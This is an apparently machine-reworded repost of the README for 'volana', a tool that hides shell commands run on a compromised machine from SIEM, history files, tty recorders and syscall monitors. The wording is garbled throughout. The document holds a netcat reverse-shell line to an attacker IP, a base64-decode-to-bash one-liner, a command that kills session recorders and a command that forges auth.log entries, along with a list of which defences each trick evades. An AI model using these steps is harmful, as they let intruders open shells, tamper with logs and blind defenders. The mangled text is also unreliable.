Shell command obfuscation to keep away from SIEM/detection system
Throughout pentest, an essential side is to be stealth. For that reason it is best to clear your tracks after your passage. However, many infrastructures log command and ship them to a SIEM in an actual time making the afterwards cleansing half alone ineffective.
volana present a easy method to conceal instructions executed on compromised machine by offering it self shell runtime (enter your command, volana executes for you). Like this you clear your tracks DURING your passage
Utilization
It is advisable to get an interactive shell. (Discover a method to spawn it, you’re a hacker, it is your job ! in any other case). Then obtain it heading in the right direction machine and launch it. that is it, now you may kind the command you need to be stealthy executed
## Obtain it from github launch
## If you happen to would not have web entry from compromised machine, discover one other approach
curl -lO -L https://github.com/ariary/volana/releases/newest/obtain/volana## Execute it
./volana
## You at the moment are beneath the radar
volana » echo "Hello SIEM crew! Do you discover me?" > /dev/null 2>&1 #you might be allowed to be a bit cocky
volana » [command]
Key phrase for volana console: * ring: allow ring mode ie every command is launched with a lot others to cowl tracks (from answer that monitor system name) * exit: exit volana console
from non interactive shell
Think about you might have a non interactive shell (webshell or blind rce), you might use encrypt and decrypt subcommand. Beforehand, you want to construct volana with embedded encryption key.
On attacker machine
## Construct volana with encryption key
make construct.volana-with-encryption## Switch it on TARGET (the distinctive detectable command)
## [...]
## Encrypt the command you need to stealthy execute
## (Right here a nc bindshell to acquire a interactive shell)
volana encr "nc [attacker_ip] [attacker_port] -e /bin/bash"
>>> ENCRYPTED COMMAND
Copy encrypted command and executed it along with your rce heading in the right direction machine
./volana decr [encrypted_command]
## Now you might have a bindshell, spawn it to make it interactive and use volana often to be stealth (./volana). + Do not forget to take away volana binary earlier than leaving (trigger decryption key can simply be retrieved from it)Why not simply conceal command with echo [command] | base64 ? And decode heading in the right direction with echo [encoded_command] | base64 -d | bash
As a result of we need to be protected in opposition to techniques that set off alert for base64 use or that search base64 textual content in command. Additionally we need to make investigation troublesome and base64 is not an actual brake.
Detection
Remember the fact that volana just isn’t a miracle that may make you completely invisible. Its purpose is to make intrusion detection and investigation more durable.
By detected we imply if we’re in a position to set off an alert if a sure command has been executed.
Disguise from
Solely the volana launching command line will probably be catched. 🧠 Nevertheless, by including an area earlier than executing it, the default bash conduct is to not reserve it
- Detection techniques which might be primarily based on historical past command output
- Detection techniques which might be primarily based on historical past recordsdata
.bash_history, “.zsh_history” and many others ..- Detection techniques which might be primarily based on bash debug traps
- Detection techniques which might be primarily based on sudo built-in logging system
- Detection techniques tracing all processes syscall system-wide (eg
opensnoop) - Terminal (tty) recorder (
script,display screen -L,sexonthebash,ovh-ttyrec, and many others..) - Straightforward to detect & keep away from:
pkill -9 script - Not a standard case
display screenis a little more troublesome to keep away from, nonetheless it doesn’t register enter (secret enter:stty -echo=> keep away from)- Command detection May very well be keep away from with
volanawith encryption
Seen for
- Detection techniques which have alert for unknown command (volana one)
- Detection techniques which might be primarily based on keylogger
- Straightforward to keep away from: copy/previous instructions
- Not a standard case
- Detection techniques which might be primarily based on syslog recordsdata (e.g.
/var/log/auth.log) - Just for
sudoorsuinstructions - syslog file might be modified and thus be poisoned as you want (e.g for /var/log/auth.log:
logger -p auth.information "No hacker is poisoning your syslog answer, don't be concerned") - Detection techniques which might be primarily based on syscall (eg auditd,LKML/eBPF)
- Tough to research, might be make unreadable by making a number of diversion syscalls
- Customized
LD_PRELOADinjection to make log - Not a standard case in any respect
Bug bounty
Sorry for the clickbait title, however no cash will probably be supplied for contibutors. 🐛
Let me know in case you have discovered: * a method to detect volana * a method to spy console that do not detect volana instructions * a method to keep away from a detection system
Credit score
